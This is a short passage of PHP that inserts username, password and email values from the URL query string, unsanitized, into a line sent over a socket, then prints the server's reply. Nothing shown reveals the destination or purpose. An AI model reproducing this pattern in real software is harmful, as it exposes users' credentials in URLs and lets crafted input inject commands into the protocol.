$_GET[username] $_GET[password] $_GET[email] \n "; print "Sending: "; print $foo; fputs($sockfd,$foo); print "Got back: "; while (! feof($sockfd) ) { print fgets($sockfd); } ?>